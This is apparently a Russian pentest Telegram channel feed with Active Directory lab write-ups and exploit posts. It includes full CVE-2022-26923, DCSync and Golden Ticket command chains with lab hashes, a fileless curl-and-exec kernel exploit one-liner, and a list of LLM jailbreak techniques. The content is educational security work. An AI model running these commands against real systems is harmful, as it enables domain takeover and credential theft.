Не знаю почему, но свое возвращение хотелось бы начать с райтапа 🤨
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Teletype
Codeby Games "Системный администратор" Active Directory WriteUp by artrone
Доброго дня, мои начинающие хацкеры! В последнее время, стало популярным ломать АД. Не знаю, с чем это связано, но да ладно. Сегодня...
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #active_directory
Please open Telegram to view this post
VIEW IN TELEGRAM
Тачка: Королевство
Категория: Active Directory
Платформа: Codeby Games
Закрепляем навыки атак на контроллер домена Active Directory🖼:
пылесосим сетевые ресурсы,
перечисляем LDAP,
устраиваем прожарку Kerberos,
дампим доменного администратора😉
Читать: тык
P.S. Скоро будет не только текстовый формат
#active_directory #райтап
Категория: Active Directory
Платформа: Codeby Games
Закрепляем навыки атак на контроллер домена Active Directory🖼:
пылесосим сетевые ресурсы,
перечисляем LDAP,
устраиваем прожарку Kerberos,
дампим доменного администратора😉
Читать: тык
P.S. Скоро будет не только текстовый формат
#active_directory #райтап
👾Закрепление в системе через RDP👾
Рассмотрим необычный способ закрепиться в системе, используя дефолтную служебную прогу utilman.exe
Читать: тык
Смотреть: тык
UPD: Что ж, материал переходит на новый уровень, как и обещал. Прошу обратную связь, касательно видео подачи.
#персист
Рассмотрим необычный способ закрепиться в системе, используя дефолтную служебную прогу utilman.exe
Читать: тык
Смотреть: тык
UPD: Что ж, материал переходит на новый уровень, как и обещал. Прошу обратную связь, касательно видео подачи.
#персист
Teletype
Persistence via RDP by artrone
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!
🎉 Всех с наступающим 🎉
Хотелось бы всем пожелать упорства, трудолюбия и побольше мотивации 😇
Хотелось бы всем пожелать упорства, трудолюбия и побольше мотивации 😇
🚪PAM backdoor for SSH Часть 1/2🚪
В данной статье мы рассмотрим создание собственного модуля PAM для закрепления в системе, научимся правильно редачить конфиги и заметать следы своего присутствия.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_1
Смотреть: https://www.youtube.com/watch?v=puf7jLTga1o
UPD: вторая часть будет на днях
#персист
В данной статье мы рассмотрим создание собственного модуля PAM для закрепления в системе, научимся правильно редачить конфиги и заметать следы своего присутствия.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_1
Смотреть: https://www.youtube.com/watch?v=puf7jLTga1o
UPD: вторая часть будет на днях
#персист
Teletype
PAM backdoor by artrone ЧАСТЬ 1/2
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!
🚪PAM backdoor Часть 2/2🚪
Во второй части статьи мы углубляемся в тему внедрения backdoor'ов, рассматривая PAM. Мы пройдем через процесс изменения исходного кода в личных целях и его замены с легитимным файлом, освещая ключевые моменты и рассматривая общие техники ухода от детектирования.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_2
#персист
Во второй части статьи мы углубляемся в тему внедрения backdoor'ов, рассматривая PAM. Мы пройдем через процесс изменения исходного кода в личных целях и его замены с легитимным файлом, освещая ключевые моменты и рассматривая общие техники ухода от детектирования.
Читать: https://teletype.in/@hackerblog/pam_backdoor_part_2
#персист
Teletype
PAM backdoor by artrone ЧАСТЬ 2/2
Добро пожаловать во вторую часть статьи "PAM backdoor". В предыдущей части мы обсудили, что такое PAM (Pluggable Authentication Modules)...
Этот материал подойдёт для тех, кто никогда не работал с Command & Control (C&C, C2) фрэймворком Metasploit или просто хочет познакомиться с ним получше
Здесь мы рассмотрим:
Читать: https://teletype.in/@hackerblog/metasploit
#пентест #софт
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Metasploit Framework 101 by cherepawwka
Сегодня мы чуть подробнее познакомимся с фрэймворком Metasploit, его консолью и инструментом msfvenom, а также посмотрим на него в действии.
Forwarded from Похек (Сергей Зыбнев)
#AMA
Что такое AMA (Ask Me Anything) эфир? Стрим, когда вы мне сможете задавать любые адекватные и даже личные вопросы в разумных рамках. Подобное уже делал уважаемый @CuriV на своем канале @pathsecure.
Буду благодарен коллегам за репост!
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет🤝
Реализовал небольшой проектик по частичной автоматизации и упрощению работы с продуктом PT NAD. Основной целью было познакомиться с API NAD'а, а также немного прокачать Python скиллы🐍
Надеюсь, данная программа немного облегчит жизнь коллегам-мониторщикам 🙃
Название: RepNAD
Краткое описание: Программа позволяет в автоматическом режиме создавать/пополнять репутационные списки на основе ВПО, которые парсятся из скачанного JSON файла.
Основные функции:
•Автоматическое создание/добавление контента в репутационный список
•Ручное управление данными
•Просмотр содержимого репутационного списка
•и др.
Ознакомиться подробнее и скачать исходники тут: https://github.com/artroneee/RepNad/
#софт #полезные_материалы
Реализовал небольшой проектик по частичной автоматизации и упрощению работы с продуктом PT NAD. Основной целью было познакомиться с API NAD'а, а также немного прокачать Python скиллы🐍
Надеюсь, данная программа немного облегчит жизнь коллегам-мониторщикам 🙃
Название: RepNAD
Краткое описание: Программа позволяет в автоматическом режиме создавать/пополнять репутационные списки на основе ВПО, которые парсятся из скачанного JSON файла.
Основные функции:
•Автоматическое создание/добавление контента в репутационный список
•Ручное управление данными
•Просмотр содержимого репутационного списка
•и др.
Ознакомиться подробнее и скачать исходники тут: https://github.com/artroneee/RepNad/
#софт #полезные_материалы
GitHub
GitHub - artroneee/RepNad
Contribute to artroneee/RepNad development by creating an account on GitHub.
Forwarded from wr3dmast3r vs pentest
Сегодня мы познакомимся с уязвимостью Prototype Pollution, вспомним основы, а также посмотрим на практический пример эксплуатации данной уязвимости с использованием гаджетов и обходом фильтрации.
Дополнительно покажу несколько утилит, которые облегчат поиск и эксплуатацию данной уязвимости.
https://telegra.ph/Dirty-JavaScript--Prototype-Pollution-02-22
Дополнительно покажу несколько утилит, которые облегчат поиск и эксплуатацию данной уязвимости.
https://telegra.ph/Dirty-JavaScript--Prototype-Pollution-02-22
Telegraph
Dirty JavaScript — Prototype Pollution
Сегодня я расскажу про такую уязвимость, как загрязнение прототипа. Мы ознакомимся с практическим примером применения этой уязвимости в лабораторной, а также рассмотрим некоторые утилиты для её поиска. Перед тем, как мы приступим к поиску уязвимостей загрязнения…
Привет!🤝
Недавно обнаружил крутую фичу в Burp Suite - макросы
Настолько я удивился такому функционалу, что решил написать коротенькую статью про это😁
Читать: https://teletype.in/@hackerblog/j5dnrOte0dt
Отпишитесь, кто знал, что такая тема есть.
Недавно обнаружил крутую фичу в Burp Suite - макросы
Настолько я удивился такому функционалу, что решил написать коротенькую статью про это😁
Читать: https://teletype.in/@hackerblog/j5dnrOte0dt
Отпишитесь, кто знал, что такая тема есть.
Teletype
Раскрываем секретные функции: магия макросов в Burp Suite
Привет! Если ты думаешь, что знаешь всё о Burp Suite, я тебя удивлю! Этот мощный инструмент для тестирования веб-приложений скрывает...
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE
➡️ Github PoC
🌚 @poxek
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from wr3dmast3r vs pentest
Если тебе всё ещё интересен экзамен академии PortSwigger, то я выпустил исправленную версию своей работы и рассказал немного о себе 😳
Подробнее
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
BSCP — разгадываем тайны сертификации от академии PortSwigger
Привет, Хабр! Меня зовут Никита, я пентестер, специализируюсь на веб-тестировании. Наверняка многие из вас задумывались о подтверждении своей экспертизы с помощью некоторых сертификаций. Сегодня хочу...
Forwarded from Purple Chronicles (ELK Enjoyer)
🎫Немного о Golden Ticket🎫
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩💻 :
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
После обновления выпустить золотой билет можно следующей командой:
При этом обратная совместимость со старым PAC так же останется:
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4
# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt
# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute
# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova
# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts
# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
amaslova
!Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
Forwarded from PWN AI (Artyom Semenov)
https://github.com/prompt-security/ps-fuzz
Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:
Это список атак, которые он пытается реализовать:
Jailbreak:
AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion
Prompt Injection:
Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack
System prompt extraction:
System Prompt Stealer
Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:
Это список атак, которые он пытается реализовать:
Jailbreak:
AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion
Prompt Injection:
Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack
System prompt extraction:
System Prompt Stealer
🔓 Сила шифрования или как я выявил недостаток работы Defender’а 🔓
В данной статье рассмотрим, как технологии шифрования помогают в защите конфиденциальности и целостности данных, а также как современные средства безопасности могут оказаться недостаточными для полноценный защиты.
Читать: https://teletype.in/@hackerblog/PtB5Fw2oQbX
UPD: Ура-ура! Наконец, я закончил, наверное, самый трудозатратный ресёрч на канале, который занял у меня 3 месяца. Посты теперь будут выходить чаще.
В данной статье рассмотрим, как технологии шифрования помогают в защите конфиденциальности и целостности данных, а также как современные средства безопасности могут оказаться недостаточными для полноценный защиты.
Читать: https://teletype.in/@hackerblog/PtB5Fw2oQbX
UPD: Ура-ура! Наконец, я закончил, наверное, самый трудозатратный ресёрч на канале, который занял у меня 3 месяца. Посты теперь будут выходить чаще.
Teletype
Сила шифрования или как я выявил недостаток работы Defender’а
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!